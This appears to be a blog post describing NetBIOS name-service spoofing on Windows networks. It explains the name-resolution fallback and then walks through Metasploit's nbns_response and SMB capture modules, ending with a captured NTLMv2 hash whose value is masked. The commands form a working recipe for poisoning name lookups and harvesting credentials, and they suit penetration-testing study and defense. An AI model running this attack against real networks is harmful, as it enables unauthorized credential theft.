There have been several posts regarding NetBIOS spoofing, and i thought i would write something up regarding it.

When a windows machine tries to access a resource on the network it will try and resolve the name of the resource to an IP address. It does this by first searching it’s host file, and if that fails (and generally does), it will then try DNS. Well DNS doesnt have records for everything, so the windows machine tries NetBIOS and if you dont have a WINS server setup, it will send a broadcast message asking if anyone knows about that resource. Perfect, we can respond with a machine that we control.

How often to machines fall back to NetBIOS queries? Laptops that are part of a domain on a different wireless network often query for resources. Often companies have a internal website configured. Also most web browsers when you perform a search they have to determine if you are trying to access a local resource or performing a search.

msf  auxiliary(smb) > use auxiliary/spoof/nbns/nbns_response
msf  auxiliary(nbns_response) > show options

Module options (auxiliary/spoof/nbns/nbns_response):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   REGEX      .*               yes       Regex applied to the NB Name to determine if spoofed reply is sent
   SPOOFIP    yes       IP address with which to poison responses
   TIMEOUT    500              yes       The number of seconds to wait for new data

msf  auxiliary(nbns_response) > run
[*] Auxiliary module execution completed

[*] NBNS Spoofer started. Listening for NBNS requests...
msf  auxiliary(nbns_response) > use auxiliary/server/capture/smb
msf  auxiliary(smb) > show options

Module options (auxiliary/server/capture/smb):

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
   CHALLENGE   1122334455667788  yes       The 8 byte challenge
   JOHNPWFILE                    no        The prefix to the local filename to store the hashes in JOHN format
   SRVHOST           yes       The local host to listen on. This must be an address on the local machine or
   SRVPORT     445               yes       The local port to listen on.
   SSL         false             no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

msf  auxiliary(smb) > set JOHNPWFILE /pentest/passwords/wordlists/darkc0de.lst
JOHNPWFILE => /pentest/passwords/wordlists/darkc0de.lst
msf  auxiliary(smb) > run
[*] Auxiliary module execution completed

[*] Server started.
msf  auxiliary(smb) > [*] 2012-01-29 09:45:40 -0500
NTLMv2 Response Captured from
USER:keith DOMAIN:cheeze-it OS: LM:
NTHASH:******hash************* NT_CLIENT_CHALLENGE:****************************************************